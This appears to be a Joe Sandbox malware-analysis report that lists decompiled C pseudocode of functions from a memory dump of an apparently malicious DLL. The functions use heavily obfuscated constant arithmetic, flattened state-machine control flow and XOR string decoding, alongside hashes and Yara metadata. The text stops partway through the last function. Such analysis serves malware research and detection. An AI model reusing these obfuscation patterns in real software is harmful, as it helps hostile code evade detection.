Instruction Fuzzy Hash: 7A91FD720083449FD758CF66C88991BFBE1FBC4B58F40892DF69686261D3B6C949CF82

Uniqueness

Uniqueness Score: -1.00%

Function 00880A64, Relevance: 1.4, Strings: 1, Instructions: 197
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E00880A64(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				void* _t180;
				void* _t211;
				void* _t212;
				void* _t214;
				void* _t238;
				void* _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int* _t250;

				_push(_a8);
				_t238 = __edx;
				_t212 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0087FE29(_t180);
				_v56 = 0xc0d7de;
				_t250 =  &(( &_v76)[4]);
				_v56 = _v56 << 2;
				_v56 = _v56 << 7;
				_t239 = 0;
				_v56 = _v56 ^ 0x81afbc01;
				_t214 = 0xaac46ca;
				_v64 = 0x3a8e28;
				_v64 = _v64 >> 1;
				_v64 = _v64 + 0xe78e;
				_v64 = _v64 >> 0xd;
				_v64 = _v64 ^ 0x000000f0;
				_v16 = 0x168660;
				_v16 = _v16 >> 5;
				_v16 = _v16 ^ 0x4000b433;
				_v8 = 0x28d09b;
				_t240 = 0x6c;
				_v8 = _v8 / _t240;
				_v8 = _v8 ^ 0x400060bf;
				_v72 = 0xacfd47;
				_v72 = _v72 ^ 0xaf3d897a;
				_v72 = _v72 << 2;
				_v72 = _v72 >> 1;
				_v72 = _v72 ^ 0x5f2a69ef;
				_v60 = 0xaad3e;
				_v60 = _v60 >> 7;
				_v60 = _v60 + 0x530f;
				_v60 = _v60 ^ 0x00047061;
				_v20 = 0xd1ee8e;
				_v20 = _v20 >> 0xd;
				_v20 = _v20 ^ 0x00058db8;
				_v76 = 0xa228f;
				_t241 = 0x1c;
				_v76 = _v76 / _t241;
				_t242 = 0x30;
				_v76 = _v76 * 0x79;
				_v76 = _v76 | 0xd88c69ec;
				_v76 = _v76 ^ 0xd8a0fe12;
				_v24 = 0xd67a62;
				_v24 = _v24 + 0xffff00ae;
				_v24 = _v24 ^ 0x00d8581e;
				_v40 = 0xcb2b10;
				_v40 = _v40 / _t242;
				_t243 = 0x14;
				_v40 = _v40 / _t243;
				_v40 = _v40 ^ 0x0006cc26;
				_v44 = 0xf09ad;
				_v44 = _v44 << 0xd;
				_v44 = _v44 | 0x1b12e533;
				_v44 = _v44 ^ 0xfb3e9f34;
				_v48 = 0xeb0c29;
				_v48 = _v48 * 0x7b;
				_t244 = 0x65;
				_v48 = _v48 / _t244;
				_v48 = _v48 ^ 0x0113d763;
				_v52 = 0x64962b;
				_v52 = _v52 + 0xfffff671;
				_v52 = _v52 + 0x8f00;
				_v52 = _v52 ^ 0x00671ded;
				_v28 = 0xef32a4;
				_v28 = _v28 + 0xf3f6;
				_t245 = 0x57;
				_v28 = _v28 / _t245;
				_v28 = _v28 ^ 0x000c1b67;
				_v32 = 0x4955c4;
				_v32 = _v32 << 7;
				_t246 = 0x75;
				_v32 = _v32 / _t246;
				_v32 = _v32 ^ 0x005efa9b;
				_v68 = 0x926f14;
				_v68 = _v68 ^ 0x2f6794d2;
				_t247 = 0x7f;
				_v68 = _v68 / _t247;
				_v68 = _v68 + 0xe0be;
				_v68 = _v68 ^ 0x00650f61;
				_v12 = 0xa3b92d;
				_v12 = _v12 + 0xffff94bd;
				_v12 = _v12 ^ 0x00ae9057;
				_v36 = 0x571707;
				_v36 = _v36 << 3;
				_v36 = _v36 + 0xffff7ee3;
				_v36 = _v36 ^ 0x02b89578;
				do {
					while(_t214 != 0x665f559) {
						if(_t214 == 0x8e4e5a6) {
							_push(_t214);
							_push(_t214);
							_t239 = E0086C5D8(_v4 + _v4);
							_t250 =  &(_t250[3]);
							if(_t239 != 0) {
								_t214 = 0x665f559;
								continue;
							}
						} else {
							if(_t214 == 0xa67d5aa) {
								_t211 = E0087C4F8(_v72, _v16 | _v56, _t212, 0, _v60, _v20, _v76, _v24,  &_v4, _t238);
								_t250 =  &(_t250[8]);
								if(_t211 != 0) {
									_t214 = 0x8e4e5a6;
									continue;
								}
							} else {
								if(_t214 != 0xaac46ca) {
									goto L11;
								} else {
									_t214 = 0xa67d5aa;
									continue;
								}
							}
						}
						goto L12;
					}
					E0087C4F8(_v28, _v8 | _v64, _t212, _t239, _v32, _v68, _v12, _v36,  &_v4, _t238);
					_t250 =  &(_t250[8]);
					_t214 = 0xee0867e;
					L11:
				} while (_t214 != 0xee0867e);
				L12:
				return _t239;
			}

0x00880a6b
0x00880a6f
0x00880a71
0x00880a73
0x00880a77
0x00880a78
0x00880a79
0x00880a7e
0x00880a86
0x00880a89
0x00880a90
0x00880a95
0x00880a97
0x00880a9f
0x00880aa4
0x00880aac
0x00880ab0
0x00880ab8
0x00880abd
0x00880ac5
0x00880acd
0x00880ad2
0x00880ada
0x00880ae8
0x00880aed
0x00880af3
0x00880afb
0x00880b03
0x00880b0b
0x00880b10
0x00880b14
0x00880b1c
0x00880b24
0x00880b29
0x00880b31
0x00880b39
0x00880b41
0x00880b46
0x00880b4e
0x00880b5a
0x00880b5f
0x00880b6a
0x00880b6d
0x00880b71
0x00880b79
0x00880b81
0x00880b89
0x00880b91
0x00880b99
0x00880ba9
0x00880bb1
0x00880bb4
0x00880bb8
0x00880bc0
0x00880bc8
0x00880bcd
0x00880bd5
0x00880bdd
0x00880bea
0x00880bf6
0x00880bfb
0x00880c01
0x00880c09
0x00880c11
0x00880c19
0x00880c21
0x00880c29
0x00880c31
0x00880c3d
0x00880c42
0x00880c48
0x00880c50
0x00880c58
0x00880c61
0x00880c66
0x00880c6c
0x00880c74
0x00880c7c
0x00880c88
0x00880c90
0x00880c94
0x00880c9c
0x00880ca4
0x00880cac
0x00880cb4
0x00880cbc
0x00880cc4
0x00880cc9
0x00880cd1
0x00880cd9
0x00880cd9
0x00880ce7
0x00880d50
0x00880d51
0x00880d5a
0x00880d5c
0x00880d61
0x00880d63
0x00000000
0x00880d63
0x00880ce9
0x00880cef
0x00880d29
0x00880d2e
0x00880d33
0x00880d35
0x00000000
0x00880d35
0x00880cf1
0x00880cf7
0x00000000
0x00880cfd
0x00880cfd
0x00000000
0x00880cfd
0x00880cf7
0x00880cef
0x00000000
0x00880ce7
0x00880d8e
0x00880d93
0x00880d96
0x00880d9b
0x00880d9b
0x00880da8
0x00880db0

Strings

i*_, xrefs: 00880B14

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: i*_
API String ID: 0-4175851924
Opcode ID: 033916526ebd42fe384ae7de4cef2794808c9c5efeeb7d3c76fe8acba1a56522
Instruction ID: 7b3ddb6fc18e79de716a65741c2232ecd136e5e288fea15a06ecbff94a7a64c0
Opcode Fuzzy Hash: 033916526ebd42fe384ae7de4cef2794808c9c5efeeb7d3c76fe8acba1a56522
Instruction Fuzzy Hash: 6F8140721083409FD354CE65D98A91BFBE1FBC4B58F40891CF9969A260D3B6CA49CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0087C5D5, Relevance: 1.4, Strings: 1, Instructions: 194
COMMONCrypto

Download Yara Rule

C-Code - Quality: 77%

			E0087C5D5() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				short _t190;
				signed int _t195;
				void* _t198;
				void* _t217;
				intOrPtr _t220;
				void* _t221;
				short* _t222;
				void* _t223;
				short* _t224;
				signed int _t225;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t230;
				signed int _t231;
				void* _t232;

				_t220 =  *0x886214; // 0x0
				_v28 = 0x163a95;
				_t221 = _t220 + 0x23c;
				_t198 = 0x1db3eac;
				_t225 = 0x2a;
				_v28 = _v28 * 0x43;
				_v28 = _v28 | 0x78fa3d4f;
				_v28 = _v28 + 0xb7b9;
				_v28 = _v28 ^ 0x7df609b0;
				_v36 = 0x641eba;
				_v36 = _v36 / _t225;
				_v36 = _v36 << 8;
				_v36 = _v36 ^ 0x02679a20;
				_v60 = 0x1f128d;
				_v60 = _v60 | 0x723f4715;
				_v60 = _v60 ^ 0x7234fc66;
				_v8 = 0xac331e;
				_v8 = _v8 ^ 0xe591128e;
				_v8 = _v8 << 4;
				_v8 = _v8 + 0xffffc28e;
				_v8 = _v8 ^ 0x53d02dfe;
				_v32 = 0x5bb4ea;
				_v32 = _v32 ^ 0xe8579be7;
				_v32 = _v32 + 0xffff04e9;
				_v32 = _v32 ^ 0xe8074079;
				_v40 = 0xd0bea7;
				_v40 = _v40 << 1;
				_t226 = 0x1d;
				_v40 = _v40 / _t226;
				_v40 = _v40 ^ 0x000c7110;
				_v64 = 0x41c151;
				_v64 = _v64 << 1;
				_v64 = _v64 ^ 0x00828c11;
				_v44 = 0x3034cc;
				_t227 = 0x1a;
				_v44 = _v44 / _t227;
				_v44 = _v44 + 0xffffde13;
				_v44 = _v44 ^ 0x000cb2d3;
				_v12 = 0xb1859b;
				_v12 = _v12 ^ 0xe04d3b3c;
				_t228 = 0x25;
				_v12 = _v12 * 7;
				_v12 = _v12 | 0x0065acf4;
				_v12 = _v12 ^ 0x26e71960;
				_v68 = 0x4e3808;
				_v68 = _v68 | 0x4ec02654;
				_v68 = _v68 ^ 0x4ec4b15d;
				_v48 = 0x7afa7b;
				_v48 = _v48 ^ 0xc20923f7;
				_v48 = _v48 / _t228;
				_v48 = _v48 ^ 0x0544c062;
				_v20 = 0x2ff9aa;
				_v20 = _v20 + 0xffffa865;
				_v20 = _v20 * 0x24;
				_v20 = _v20 + 0x4632;
				_v20 = _v20 ^ 0x06bd6615;
				_v16 = 0x2d8807;
				_v16 = _v16 * 0x5f;
				_v16 = _v16 << 3;
				_v16 = _v16 << 6;
				_v16 = _v16 ^ 0xcaf714e8;
				_v52 = 0xcb8ac1;
				_v52 = _v52 << 0xb;
				_v52 = _v52 >> 0xc;
				_v52 = _v52 ^ 0x000dc079;
				_v24 = 0xed824f;
				_v24 = _v24 + 0x6e9c;
				_t229 = 0x19;
				_v24 = _v24 / _t229;
				_v24 = _v24 >> 0x10;
				_v24 = _v24 ^ 0x00044037;
				_v56 = 0xd4fc47;
				_v56 = _v56 << 5;
				_v56 = _v56 << 0xb;
				_v56 = _v56 ^ 0xfc4a9c10;
				_v72 = 0x35720e;
				_v72 = _v72 ^ 0x5bf10d31;
				_v72 = _v72 ^ 0x5bc050cb;
				do {
					while(_t198 != 0x1db3eac) {
						if(_t198 == 0x2b86adf) {
							E0086E404(_v56, 1, _v72, 3, _t221);
							 *((short*)(_t221 + 6)) = 0;
							return 0;
						}
						if(_t198 == 0x6ec99df) {
							_push(_t198);
							_push(_t198);
							_t230 = E0087CCA0(4, 0x10);
							E0086E404(_v52, 1, _v24, _t230, _t221);
							_t232 = _t232 + 0x1c;
							_t222 = _t221 + _t230 * 2;
							_t198 = 0x2b86adf;
							_t190 = 0x2e;
							 *_t222 = _t190;
							_t221 = _t222 + 2;
							continue;
						}
						if(_t198 != 0x6f740c2) {
							goto L8;
						}
						_push(_t198);
						_push(_t198);
						_t195 = E0087CCA0(4, 0x10);
						_push(_t221);
						_push(1);
						_push(_v64);
						_t231 = _t195;
						_t217 = 2;
						E0086E404(_v40, _t217);
						_t223 = _t221 + 2;
						E0086E404(_v44, 1, _v12, _t231, _t223);
						_t232 = _t232 + 0x28;
						_t224 = _t223 + _t231 * 2;
						_t198 = 0x6ec99df;
						_t190 = 0x5c;
						 *_t224 = _t190;
						_t221 = _t224 + 2;
					}
					E0086DC1B(_t198);
					_t198 = 0x6f740c2;
					L8:
				} while (_t198 != 0x41dad81);
				return _t190;
			}

0x0087c5dd
0x0087c5e5
0x0087c5ec
0x0087c5f6
0x0087c5fd
0x0087c600
0x0087c603
0x0087c60a
0x0087c611
0x0087c618
0x0087c626
0x0087c629
0x0087c62d
0x0087c634
0x0087c63b
0x0087c642
0x0087c649
0x0087c650
0x0087c657
0x0087c65b
0x0087c662
0x0087c669
0x0087c670
0x0087c677
0x0087c67e
0x0087c685
0x0087c68c
0x0087c692
0x0087c697
0x0087c69c
0x0087c6a3
0x0087c6aa
0x0087c6ad
0x0087c6b4
0x0087c6be
0x0087c6c3
0x0087c6c8
0x0087c6cf
0x0087c6d6
0x0087c6dd
0x0087c6e8
0x0087c6e9
0x0087c6ec
0x0087c6f3
0x0087c6fa
0x0087c701
0x0087c708
0x0087c70f
0x0087c716
0x0087c722
0x0087c725
0x0087c72c
0x0087c733
0x0087c73e
0x0087c741
0x0087c748
0x0087c74f
0x0087c75a
0x0087c75d
0x0087c761
0x0087c767
0x0087c76e
0x0087c775
0x0087c779
0x0087c77d
0x0087c784
0x0087c78b
0x0087c797
0x0087c79a
0x0087c79d
0x0087c7a1
0x0087c7a8
0x0087c7af
0x0087c7b3
0x0087c7b7
0x0087c7be
0x0087c7c5
0x0087c7cc
0x0087c7d3
0x0087c7d3
0x0087c7e5
0x0087c8bb
0x0087c8c5
0x00000000
0x0087c8c5
0x0087c7f1
0x0087c85e
0x0087c85f
0x0087c869
0x0087c876
0x0087c87b
0x0087c87e
0x0087c881
0x0087c888
0x0087c889
0x0087c88c
0x00000000
0x0087c88c
0x0087c7f9
0x00000000
0x00000000
0x0087c80b
0x0087c80c
0x0087c811
0x0087c816
0x0087c817
0x0087c819
0x0087c81f
0x0087c823
0x0087c824
0x0087c829
0x0087c837
0x0087c83c
0x0087c83f
0x0087c842
0x0087c849
0x0087c84a
0x0087c84d
0x0087c84d
0x0087c897
0x0087c89c
0x0087c8a1
0x0087c8a1
0x00000000

Strings

<;M, xrefs: 0087C6DD

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: <;M
API String ID: 0-164005337
Opcode ID: c63cc54a95598f17a7ff99bac5858153dd06a1fd7b6fb5f0d6541a7e2731b62d
Instruction ID: 84a8a303fad8e33bc529cd2036c6d474d632af90e89e2731dc61db58faead1bf
Opcode Fuzzy Hash: c63cc54a95598f17a7ff99bac5858153dd06a1fd7b6fb5f0d6541a7e2731b62d
Instruction Fuzzy Hash: 38919971D00318EBDB18CFA9D98A9EEBBB1FF44310F20805AE516BB250C7B45A46CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00861F38, Relevance: 1.4, Strings: 1, Instructions: 134
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E00861F38(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				char _v556;
				intOrPtr _v564;
				char _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				void* _t89;
				signed int _t97;
				intOrPtr _t102;
				signed int _t104;
				char* _t105;
				void* _t119;
				signed int* _t125;

				_push(E0086E5C0);
				_push(_a4);
				_t102 = __ecx;
				_push(__edx);
				_push(__ecx);
				E0087FE29(_t89);
				_v588 = 0xa9001c;
				_t125 =  &(( &_v624)[4]);
				_v588 = _v588 + 0xfffff841;
				_v588 = _v588 ^ 0x00a8f85f;
				_t119 = 0x7750dec;
				_v596 = 0x801276;
				_v596 = _v596 << 8;
				_v596 = _v596 ^ 0x801c5a8c;
				_v592 = 0xe5da65;
				_v592 = _v592 | 0x8d0ca196;
				_v592 = _v592 ^ 0x8de55992;
				_v612 = 0x74ea46;
				_v612 = _v612 >> 6;
				_v612 = _v612 | 0x4c0dce94;
				_v612 = _v612 ^ 0x4c0245c2;
				_v604 = 0x7f8ae0;
				_t104 = 0x6f;
				_v604 = _v604 / _t104;
				_v604 = _v604 + 0x431c;
				_v604 = _v604 ^ 0x0002d2ab;
				_v608 = 0x66ed0;
				_v608 = _v608 >> 5;
				_v608 = _v608 * 0x5a;
				_v608 = _v608 ^ 0x001395e3;
				_v620 = 0x99715e;
				_v620 = _v620 + 0xffff5a71;
				_v620 = _v620 << 0x10;
				_v620 = _v620 + 0xbf19;
				_v620 = _v620 ^ 0xcbc1aabc;
				_v624 = 0x2a4f9d;
				_v624 = _v624 | 0x7ed7085f;
				_v624 = _v624 + 0xffff4297;
				_v624 = _v624 | 0x5a00af06;
				_v624 = _v624 ^ 0x7efc78c9;
				_v600 = 0xb3c9ce;
				_v600 = _v600 + 0xffff4f2d;
				_v600 = _v600 ^ 0x00b0dce6;
				_t118 = _v600;
				_v616 = 0x17dc9d;
				_v616 = _v616 ^ 0xb350768a;
				_v616 = _v616 + 0xffff5841;
				_v616 = _v616 ^ 0xb3483330;
				do {
					while(_t119 != 0x26f316f) {
						if(_t119 == 0x4832572) {
							_v556 = 0x22c;
							_t105 =  &_v556;
							_t97 = E0086BD23(_t105, _t118, _v612, _v604, _v608);
							_t125 =  &(_t125[3]);
							L12:
							asm("sbb esi, esi");
							_t119 = ( ~_t97 & 0xf2b580e0) + 0xfb9b08f;
							continue;
						}
						if(_t119 == 0x7750dec) {
							_v564 = _t102;
							_t119 = 0xecc24d5;
							continue;
						}
						if(_t119 == 0x88070fd) {
							_t97 = E008806EC(_v620, _t118, _v624,  &_v556);
							_pop(_t105);
							goto L12;
						}
						if(_t119 != 0xecc24d5) {
							if(_t119 == 0xfb9b08f) {
								return E00881538(_v600, _v616, _t118);
							}
							goto L18;
						}
						_push(_t105);
						_t97 = E00867603(_v588);
						_t118 = _t97;
						_t105 = _t105;
						__eflags = _t97 - 0xffffffff;
						if(__eflags != 0) {
							_t119 = 0x4832572;
							continue;
						}
						L8:
						return _t97;
					}
					__eflags = E0086E5C0(__eflags,  &_v556,  &_v584);
					if(__eflags == 0) {
						_t119 = 0xfb9b08f;
						goto L18;
					} else {
						_t119 = 0x88070fd;
						continue;
					}
					goto L8;
					L18:
					__eflags = _t119 - 0x5c72449;
				} while (__eflags != 0);
				return _t97;
			}

0x00861f42
0x00861f47
0x00861f4e
0x00861f50
0x00861f51
0x00861f52
0x00861f57
0x00861f5f
0x00861f62
0x00861f6c
0x00861f74
0x00861f79
0x00861f86
0x00861f8b
0x00861f93
0x00861f9b
0x00861fa3
0x00861fab
0x00861fb3
0x00861fb8
0x00861fc0
0x00861fc8
0x00861fd6
0x00861fd9
0x00861fdd
0x00861fe5
0x00861fed
0x00861ff5
0x00861fff
0x00862003
0x0086200b
0x00862013
0x0086201b
0x00862020
0x00862028
0x00862030
0x00862038
0x00862040
0x00862048
0x00862050
0x00862058
0x00862060
0x00862068
0x00862070
0x00862074
0x0086207c
0x00862084
0x0086208c
0x00862094
0x00862094
0x008620a6
0x00862146
0x00862152
0x0086215a
0x0086215f
0x0086211f
0x00862123
0x0086212b
0x00000000
0x0086212b
0x008620b2
0x00862132
0x00862136
0x00000000
0x00862136
0x008620ba
0x00862118
0x0086211e
0x00000000
0x0086211e
0x008620c2
0x008620c6
0x00000000
0x008620da
0x00000000
0x008620c6
0x008620ee
0x008620f4
0x008620f9
0x008620fc
0x008620fd
0x00862100
0x00862102
0x00000000
0x00862102
0x008620e5
0x008620e5
0x008620e5
0x00862173
0x00862175
0x00862181
0x00000000
0x00862177
0x00862177
0x00000000
0x00862177
0x00000000
0x00862183
0x00862183
0x00862183
0x00000000

Strings

Ft, xrefs: 00861FAB

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: Ft
API String ID: 0-1468847975
Opcode ID: 869960230ac52ea3986084a16ca53cbf4e3a3478c3e48663ce4b9e262d05212a
Instruction ID: be752a12508be5cf7dd5bb232b2915b1b37fdf4217ce8ea186ca0ccee37eb0f2
Opcode Fuzzy Hash: 869960230ac52ea3986084a16ca53cbf4e3a3478c3e48663ce4b9e262d05212a
Instruction Fuzzy Hash: C451AD7280C7019BC358DF24D88541BBBE0FB94728F154A5DF59AA6160D7B0DA49CB83

Uniqueness

Uniqueness Score: -1.00%

Function 0087E1F8, Relevance: 1.4, Strings: 1, Instructions: 112
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E0087E1F8(signed int* __ecx, void* __edx, void* __eflags) {
				void* _t64;
				signed int _t73;
				short* _t92;
				signed int _t93;
				signed int _t99;
				unsigned int _t100;
				unsigned int _t101;
				signed int _t110;
				short* _t111;
				signed int* _t112;
				signed int* _t113;
				signed int _t114;
				signed int _t115;
				signed int _t116;
				unsigned int _t118;
				void* _t124;
				short _t126;
				void* _t128;
				void* _t130;

				_push( *(_t128 + 0x30));
				_push( *(_t128 + 0x30));
				_push( *(_t128 + 0x30));
				_push(__ecx);
				E0087FE29(_t64);
				 *(_t128 + 0x28) = 0xaa6cff;
				_t112 =  &(__ecx[1]);
				 *(_t128 + 0x28) =  *(_t128 + 0x28) + 0x5a3e;
				 *(_t128 + 0x28) =  *(_t128 + 0x28) << 0xc;
				 *(_t128 + 0x28) =  *(_t128 + 0x28) ^ 0xac7afad8;
				 *(_t128 + 0x24) = 0xf23620;
				_t114 = 0x4f;
				 *(_t128 + 0x28) =  *(_t128 + 0x24) / _t114;
				_t115 = 0x1d;
				 *(_t128 + 0x28) =  *(_t128 + 0x28) / _t115;
				 *(_t128 + 0x28) =  *(_t128 + 0x28) ^ 0x0000f47a;
				 *(_t128 + 0x24) = 0x6765f0;
				 *(_t128 + 0x24) =  *(_t128 + 0x24) | 0x7b5bc89c;
				 *(_t128 + 0x24) =  *(_t128 + 0x24) >> 1;
				 *(_t128 + 0x24) =  *(_t128 + 0x24) ^ 0x3db51d28;
				 *(_t128 + 0x30) = 0xe89ec2;
				_t116 = 0x26;
				 *(_t128 + 0x2c) =  *(_t128 + 0x30) / _t116;
				 *(_t128 + 0x2c) =  *(_t128 + 0x2c) ^ 0x00078a4c;
				_t110 =  *__ecx;
				_t113 =  &(_t112[1]);
				_t73 =  *_t112 ^ _t110;
				 *(_t128 + 0x30) = _t110;
				 *(_t128 + 0x34) = _t73;
				_t118 =  !=  ? (_t73 + 0x00000001 & 0xfffffffc) + 4 : _t73 + 1;
				_t92 = E0086C5D8(_t118 + _t118);
				_t130 = _t128 + 0x18;
				 *((intOrPtr*)(_t130 + 0x18)) = _t92;
				if(_t92 != 0) {
					_t126 = 0;
					_t111 = _t92;
					_t124 =  >  ? 0 :  &(_t113[_t118 >> 2]) - _t113 + 3 >> 2;
					if(_t124 != 0) {
						_t93 =  *(_t130 + 0x20);
						do {
							_t99 =  *_t113;
							_t113 =  &(_t113[1]);
							_t100 = _t99 ^ _t93;
							 *_t111 = _t100 & 0x000000ff;
							_t111 = _t111 + 8;
							 *((short*)(_t111 - 6)) = _t100 >> 0x00000008 & 0x000000ff;
							_t101 = _t100 >> 0x10;
							_t126 = _t126 + 1;
							 *((short*)(_t111 - 4)) = _t101 & 0x000000ff;
							 *((short*)(_t111 - 2)) = _t101 >> 0x00000008 & 0x000000ff;
						} while (_t126 < _t124);
						_t92 =  *((intOrPtr*)(_t130 + 0x1c));
					}
					 *((short*)(_t92 +  *(_t130 + 0x24) * 2)) = 0;
				}
				return _t92;
			}

0x0087e1fe
0x0087e202
0x0087e206
0x0087e20b
0x0087e20c
0x0087e211
0x0087e219
0x0087e21c
0x0087e226
0x0087e22b
0x0087e233
0x0087e241
0x0087e246
0x0087e250
0x0087e255
0x0087e25b
0x0087e263
0x0087e26b
0x0087e273
0x0087e277
0x0087e27f
0x0087e28b
0x0087e28e
0x0087e292
0x0087e29a
0x0087e29e
0x0087e2a1
0x0087e2a3
0x0087e2a7
0x0087e2bb
0x0087e2da
0x0087e2dc
0x0087e2df
0x0087e2e5
0x0087e2ed
0x0087e2ef
0x0087e300
0x0087e305
0x0087e307
0x0087e30b
0x0087e30b
0x0087e30d
0x0087e310
0x0087e315
0x0087e31d
0x0087e323
0x0087e327
0x0087e330
0x0087e331
0x0087e338
0x0087e33c
0x0087e340
0x0087e340
0x0087e34b
0x0087e34b
0x0087e357

Strings

>Z, xrefs: 0087E21C

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: >Z
API String ID: 0-2342695272
Opcode ID: 8d1f742a32db50f7dddfc35a7796f107023b2d8a4909f84100ef567bcb9ec99c
Instruction ID: a70526671590fbadad2feef4d77eb1006c4043a03deff47e5099a92ff0ed5471
Opcode Fuzzy Hash: 8d1f742a32db50f7dddfc35a7796f107023b2d8a4909f84100ef567bcb9ec99c
Instruction Fuzzy Hash: 0641B2726183119BD304DF29C48585BFBE1FFC8718F498A6EF889A7250D774D905CB86

Uniqueness

Uniqueness Score: -1.00%

Function 008655FF, Relevance: 1.4, Strings: 1, Instructions: 109
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E008655FF(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				void* _t75;
				void* _t84;
				signed int _t88;
				signed int _t89;
				void* _t92;
				intOrPtr _t109;
				signed int* _t112;

				_t108 = _a12;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0087FE29(_t75);
				_v68 = 0x7ffd4d;
				_t109 = 0;
				_v64 = 0;
				_t112 =  &(( &_v96)[5]);
				_v80 = 0x808dec;
				_v80 = _v80 << 7;
				_t92 = 0x1c7cd09;
				_t88 = 0x24;
				_v80 = _v80 * 0x7a;
				_v80 = _v80 ^ 0xa1de2a47;
				_v84 = 0x460263;
				_v84 = _v84 + 0xffffc38b;
				_v84 = _v84 + 0xffffb2e6;
				_v84 = _v84 ^ 0x0042c6ce;
				_v88 = 0x2af47a;
				_v88 = _v88 + 0xfffff2b2;
				_v88 = _v88 ^ 0xf3d8a894;
				_v88 = _v88 ^ 0xf3ffbcf7;
				_v92 = 0xf8385b;
				_v92 = _v92 / _t88;
				_v92 = _v92 + 0xffff302a;
				_v92 = _v92 ^ 0x00085c4c;
				_v96 = 0xec2811;
				_t89 = 0x6c;
				_v96 = _v96 / _t89;
				_v96 = _v96 | 0xeb0c0969;
				_v96 = _v96 ^ 0x646fa875;
				_v96 = _v96 ^ 0x8f64cfef;
				_v72 = 0x6e85b8;
				_v72 = _v72 + 0x990a;
				_v72 = _v72 + 0xffff81c6;
				_v72 = _v72 ^ 0x00684c5c;
				_v76 = 0xd1f521;
				_v76 = _v76 | 0xdf7ffbcd;
				_v76 = _v76 ^ 0xdff37ac7;
				do {
					while(_t92 != 0x19e170b) {
						if(_t92 == 0x1c7cd09) {
							_t92 = 0x19e170b;
							continue;
						} else {
							if(_t92 == 0x305f804) {
								_t84 = E00882BF0(_v88,  &_v60, _v92, _v96, _t108);
								_t112 =  &(_t112[3]);
								__eflags = _t84;
								if(__eflags != 0) {
									_t92 = 0xecd5788;
									continue;
								}
							} else {
								_t117 = _t92 - 0xecd5788;
								if(_t92 != 0xecd5788) {
									goto L11;
								} else {
									E00879D3E( &_v60, _v72, _t117, _v76, _t108 + 0x24);
									_t109 =  !=  ? 1 : _t109;
								}
							}
						}
						L6:
						return _t109;
					}
					E008622A6(_a8, _v80,  &_v60, _v84);
					_t112 =  &(_t112[2]);
					_t92 = 0x305f804;
					L11:
					__eflags = _t92 - 0xfbce5f5;
				} while (__eflags != 0);
				goto L6;
			}

0x00865606
0x0086560a
0x0086560b
0x0086560f
0x00865613
0x00865614
0x00865615
0x0086561a
0x00865622
0x00865624
0x00865628
0x0086562b
0x00865635
0x0086563a
0x0086564b
0x0086564e
0x00865652
0x0086565a
0x00865662
0x0086566a
0x00865672
0x0086567a
0x00865682
0x0086568a
0x00865692
0x0086569a
0x008656aa
0x008656ae
0x008656b6
0x008656be
0x008656ca
0x008656d2
0x008656d6
0x008656de
0x008656e6
0x008656ee
0x008656f6
0x008656fe
0x00865706
0x0086570e
0x00865716
0x0086571e
0x00865726
0x00865726
0x00865730
0x00865788
0x00000000
0x00865732
0x00865738
0x00865778
0x0086577d
